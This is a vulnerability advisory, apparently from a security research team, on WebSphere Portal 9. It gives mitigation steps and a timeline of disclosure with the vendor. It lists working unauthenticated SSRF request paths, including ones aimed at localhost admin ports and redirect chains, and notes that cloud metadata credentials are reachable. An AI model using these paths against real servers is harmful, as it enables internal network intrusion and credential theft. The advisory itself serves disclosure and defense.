Advisory: Websphere Portal SSRFs & Post Auth RCE

Dec 25, 2021

Summary

Websphere Portal 9 and potentially newer releases are vulnerable to server-side request forgery, which allows attackers to request arbitrary URLs and read the full HTTP response for these requests.

Numerous SSRF vulnerabilities exist in Websphere Portal that can be exploited without any authentication.

Additionally, Websphere Portal is also vulnerable to post-authenticate command execution, through uploading a Zip file which when extracted is vulnerable to directory traversal.

Impact

An attacker can request arbitrary URLs on behalf of the Websphere Portal server. This could allow an attacker to pivot to the internal network and/or request cloud metadata endpoints to obtain cloud credentials. Users with post-authentication access can achieve RCE by uploading a malicious Zip file.

Affected Software

Websphere Portal 9 and potentially newer releases

Product Description

WebSphere Portal is an enterprise software used to build and manage web portals. It provides access to web content and applications, while delivering personalized experiences for users. The WebSphere Portal package is a component of WebSphere application software.

Solution

We suggest that you modify all of the proxy-config.xml files in your Websphere Portal installation so that no origins are whitelisted.

Additionally, if the functionality is not necessary for your installation of Websphere Portal, remove the following folders:

PortalServer/base/wp.proxy.config/installableApps/wp.proxy.config.ear
WebSphere/wp_profile/installedApps/dockerCell/Quickr_Document_Picker.ear
WebSphere/wp_profile/config/cells/dockerCell/applications/PA_WCM_Authoring_UI.ear

Do not rely on WAF rules to prevent exploitation of this issue. There are a number of ways to reach these endpoints that WAF rules may not sufficiently cover.

Vulnerabilities

SSRFs:

GET full read SSRF:

/docpicker/internal_proxy/https/example.com
/docpicker/internal_proxy/http/example.com
/docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
/docpicker/internal_proxy/http/127.0.0.1:9100/aa

Redirect chain - turning "bad" SSRF to "good" SSRF

/docpicker/common_proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com
/wps/proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com
/wps/myproxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com
/wps/common_proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com
/wps/cmis_proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com
/wps/contenthandler/!ut/p/digest!8skKFbWr_TwcZcvoc9Dn3g/?uri=http://www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com

Arbitrary HTTP method + body:

/wps/PA_WCM_Authoring_UI/proxy/http/example.com
/wps/PA_WCM_Authoring_UI/proxy/https/example.com

Post authentication RCE details can be found here

Blog Post

The blog post detailing the steps taken for the discovery of this vulnerability can be found here.

Credits

Assetnote Security Research Team

Timeline

The timeline for this disclosure process can be found below:

  • Sept 5th, 2021: Disclosure of SSRFs and Post Auth RCE (6 reports)
  • Sept 7th, 2021: Initial response from HCL Technologies stating that the reports have been submitted to product teams
  • Oct 5th, 2021: Sent a reminder that 30 days have lapsed and 60 days remain as per our responsible disclosure policy
  • Oct 5th, 2021: Response stating that they will follow up with the team analyzing the vulnerabilities
  • Nov 8th, 2021: Sent a reminder that 60 days have lapsed and 30 days remain as per our responsible disclosure policy
  • Nov 8th, 2021: Response stating that they could not reproduce any of our findings, reminding us that we cannot claim CVEs for any of these issues as they are a CNA
  • Nov 8th, 2021: Sent a request for CVEs to HCL Technologies for the issues identified - received no response
  • Nov 20th, 2021: Sent another request for CVEs to HCL Technologies and reminded them that we will be publishing after the 90 day deadline (Dec 5th)
  • Nov 23rd, 2021: Response stating that CVEs wont be filed until remediation steps are available
  • Nov 23rd, 2021: Sent a reminder that we will be publishing after 90 day deadline, without CVEs available
  • Nov 23rd, 2021: Response stating that if we publish any information about these vulnerabilities, HCL technologies will cite you as in irresponsible vulnerability disclosure party to the communities that we post to
  • Nov 23rd, 2021: Sent a reminder that we are following our 90 day disclosure policy as stated upon initial report
  • Dec 3rd, 2021: Sent a reminder that 90 day deadline ends on Dec 5th

No response since Nov 23rd.